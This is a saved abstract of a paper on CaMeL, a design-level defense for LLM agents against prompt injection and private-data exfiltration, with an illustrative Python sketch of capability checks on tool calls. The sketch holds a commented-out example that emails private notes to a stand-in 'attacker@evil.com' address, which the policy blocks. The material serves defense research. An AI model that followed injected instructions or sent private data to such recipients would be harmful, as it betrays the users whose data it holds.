[2503.18813] Defeating Prompt Injections by Design
Created 11/26/2025 at 3:18:11 PM
LLM agents are vulnerable to prompt injection attacks when handling untrusted data. In this paper, we propose CaMeL, a robust defense that creates a protective system layer around the LLM, securing it even when the underlying models are susceptible to attacks. To operate, CaMeL explicitly extracts the control and data flows from the (trusted) query; therefore, the untrusted data retrieved by the LLM can never impact the program flow. To further improve security, CaMeL uses a notion of a capability to prevent the exfiltration of private data over unauthorized data flows, enforcing security policies when tools are called.
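As a rough illustration of the capability idea described above (not the paper's actual implementation), the sketch below tags each value with the set of principals allowed to receive it and checks a security policy at every tool call, so data derived from untrusted or private sources cannot flow to an unauthorized recipient. All names here (Value, combine, send_email, the example policy) are hypothetical.

```python
# Hypothetical sketch of CaMeL-style capability tracking; the names and the
# policy are illustrative assumptions, not the paper's actual API.
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Value:
    """A value paired with a capability: who is allowed to receive it."""
    data: str
    readers: frozenset = field(default_factory=frozenset)  # allowed recipients


def combine(*values: Value) -> frozenset:
    """Data derived from several values may only flow where all of them may."""
    readers = None
    for v in values:
        readers = v.readers if readers is None else readers & v.readers
    return readers if readers is not None else frozenset()


def send_email(recipient: Value, body: Value) -> None:
    """Tool call guarded by a policy check on the arguments' capabilities."""
    if recipient.data not in combine(body):
        raise PermissionError(
            f"policy violation: {recipient.data} may not read this data"
        )
    print(f"email sent to {recipient.data}")


# The (trusted) user query fixes the control flow, e.g. "email Bob his notes";
# the notes themselves carry a capability restricting who may receive them.
notes = Value("Q3 planning notes", readers=frozenset({"bob@example.com"}))

send_email(Value("bob@example.com"), notes)        # allowed by the policy
# send_email(Value("attacker@evil.com"), notes)    # would raise PermissionError
```

Because the program flow comes only from the trusted query, an injected instruction inside retrieved data can at most supply a value; it cannot add a tool call, and the value's capabilities still bound where it may be sent.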
ai, prompt-injection, security, llm
Public